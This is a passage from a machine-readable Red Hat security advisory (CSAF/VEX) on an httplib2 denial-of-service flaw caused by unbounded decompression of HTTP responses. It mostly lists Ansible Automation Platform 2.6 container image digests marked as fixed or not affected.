"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2498212"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in httplib2, a Python HTTP client library. This vulnerability allows a malicious or compromised HTTP server to send a small compressed data payload that, when decompressed by httplib2, expands to an extremely large size in memory. This unbounded decompression can lead to a Denial of Service (DoS) by causing the client application to run out of memory and crash.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "httplib2: httplib2: Denial of Service via unbounded decompression of HTTP response bodies",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Important vulnerability in `httplib2` allows a remote attacker to trigger a Denial of Service (DoS) in client applications. By sending a specially crafted, compressed HTTP response, a malicious server can cause the client to exhaust its memory due to unbounded decompression, leading to application crashes. This poses a significant risk to Red Hat products that use `httplib2` to process untrusted HTTP content.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
